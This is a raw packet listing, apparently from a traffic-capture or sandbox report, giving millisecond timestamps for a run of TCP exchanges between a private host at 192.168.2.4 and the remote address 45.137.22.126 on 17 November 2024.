                                                                                                                                            Nov 17, 2024 03:07:12.039033890 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039119005 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039145947 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039175034 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039212942 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039237022 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039263010 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039289951 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039309978 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039335966 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039351940 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039362907 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039406061 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039429903 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039457083 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039495945 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039505005 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039536953 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039554119 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039582968 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039625883 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039653063 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039675951 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039684057 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039700031 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039732933 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039747953 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039794922 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039817095 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039861917 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039870024 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039922953 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.039926052 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039968967 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.039997101 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040039062 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040049076 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040066957 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040091991 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040112972 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040115118 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040139914 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040160894 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040186882 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040204048 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040230036 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040273905 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040276051 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040302992 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040319920 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040333986 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040344954 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040383101 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040390968 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040416956 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040436983 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040460110 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040465117 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040498018 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040544033 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040546894 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040576935 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040594101 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040625095 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040633917 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040656090 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040677071 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040702105 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040704012 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040760040 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040787935 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040819883 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040842056 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040863037 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040868998 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040919065 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.040942907 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.040997982 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041019917 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041047096 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041074038 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041100025 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041121960 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041148901 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041177034 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041194916 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041202068 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041220903 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041244984 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041268110 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041349888 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041403055 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041405916 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041456938 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041467905 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041495085 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041522026 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041527033 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041555882 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041558981 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041582108 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041606903 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041624069 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041651011 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041676044 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041698933 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041699886 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041731119 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041745901 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041779041 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041779995 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041810036 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041831017 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041857958 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041862011 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041908026 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041924000 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041950941 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.041970968 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041999102 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.041999102 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042031050 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042047977 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042078018 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042088032 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042131901 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042140961 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042167902 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042190075 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042198896 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042212963 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042247057 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042262077 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042296886 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042309046 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042335987 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042361021 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042382002 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042387009 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042407990 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042434931 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042439938 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042460918 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042485952 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042486906 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042538881 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042548895 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042581081 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042606115 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042639017 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042643070 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042692900 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042694092 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042746067 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042923927 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042952061 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.042973042 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.042996883 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043029070 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043077946 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043080091 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043128014 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043145895 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043173075 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043193102 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043221951 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043236971 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043263912 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043287992 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043312073 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043364048 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043390989 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043418884 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043426991 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043442011 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043473959 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043476105 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043524027 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043540955 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043569088 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043592930 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043625116 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043636084 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043663979 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043708086 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043711901 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043742895 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043767929 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043792963 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043797016 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043823957 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043838978 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043867111 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043905020 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043931007 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043955088 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.043962002 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.043977976 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044008970 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044030905 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044071913 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044073105 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044099092 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044126034 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044145107 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044157028 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044172049 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044200897 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044203043 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044226885 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044249058 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044250965 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044280052 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044295073 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044326067 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044332027 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044373035 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044409037 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044435978 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044457912 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044492960 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044501066 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044528008 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044548988 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044574976 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044578075 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044609070 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044626951 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044658899 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044703007 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044729948 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044751883 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044781923 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044867039 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044894934 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044924021 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044943094 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044950008 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.044969082 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.044992924 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045005083 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045021057 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045053005 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045084000 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045097113 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045131922 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045152903 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045191050 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045195103 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045221090 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045245886 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045268059 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045270920 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045299053 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045329094 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045353889 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045375109 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045424938 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045425892 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045473099 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045496941 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045523882 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045545101 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045567036 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045569897 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045599937 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045628071 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045660019 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045664072 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045713902 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045727968 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045772076 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045778036 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045818090 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045820951 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045870066 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045893908 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045943975 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.045954943 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.045999050 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046004057 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046046019 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046053886 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046097994 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046108961 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046134949 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046164036 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046190023 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046216965 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046243906 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046266079 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046289921 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046309948 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046336889 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046356916 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046384096 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046384096 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046415091 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046442032 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046473026 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046494961 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046520948 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046542883 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046552896 CET556154973745.137.22.126192.168.2.4
                                                                                                                                            Nov 17, 2024 03:07:12.046566010 CET4973755615192.168.2.445.137.22.126
                                                                                                                                            Nov 17, 2024 03:07:12.046593904 CET4973755615192.168.2.445.137.22.126
